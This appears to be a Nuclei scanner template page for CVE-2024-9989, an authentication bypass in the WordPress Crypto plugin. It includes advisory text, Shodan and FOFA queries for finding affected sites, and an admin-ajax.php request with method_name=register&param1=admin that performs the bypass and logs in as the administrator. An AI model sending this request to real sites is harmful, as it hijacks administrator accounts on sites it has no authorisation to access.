Crypto <= 2.15 - Authentication Bypass

ID: CVE-2024-9989

Severity: critical

Author: s4e-io

Tags: cve,cve2024,wordpress,wp,wp-plugin,crypto,auth-bypass

Description

The Crypto plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.15. This is due a to limited arbitrary method call to ‘crypto_connect_ajax_process::log_in’ function in the ‘crypto_connect_ajax_process’ function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.

YAML Source

id: CVE-2024-9989

info:
  name: Crypto <= 2.15 - Authentication Bypass
  author: s4e-io
  severity: critical
  description: |
    The Crypto plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.15. This is due a to limited arbitrary method call to 'crypto_connect_ajax_process::log_in' function in the 'crypto_connect_ajax_process' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.
  reference:
    - https://github.com/wy876/POC/blob/main/WordPress/WordPress%E6%8F%92%E4%BB%B6Crypto%E8%BA%AB%E4%BB%BD%E8%AE%A4%E8%AF%81%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0(CVE-2024-9989).md
    - https://mp.weixin.qq.com/s/hC8A1DeS-LWGpNIFKeiMBQ
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/e21bd924-1d96-4371-972a-5c99d67261cc?source=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9989
    - https://github.com/advisories/GHSA-hmfh-w3mx-w6j4
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-9989
    cwe-id: CWE-288
    epss-score: 0.00063
    epss-percentile: 0.29451
    cpe: cpe:2.3:a:odude:crypto_tool:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: odude
    product: crypto_tool
    framework: wordpress
    shodan-query: http.html:"wp-content/plugins/crypto"
    fofa-query: body="wp-content/plugins/crypto"
  tags: cve,cve2024,wordpress,wp,wp-plugin,crypto,auth-bypass

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/crypto")'
        internal: true

  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=crypto_connect_ajax_process&method_name=register&param1=admin HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: set_cookie
        words:
          - "wordpress_sec_"
          - "wordpress_logged_in_"
        condition: or

      - type: word
        part: body
        words:
          - "error"
          - "false"
          - "success"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100cf22213154136e9f7a5173d10e3b8b08cb25667594e5171143e37224512747bc02202cfbc595e96568edbec723cb30612317dbfe87005fc56d8f6ef38ec1b70c3056:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-9989.yaml"

View on Github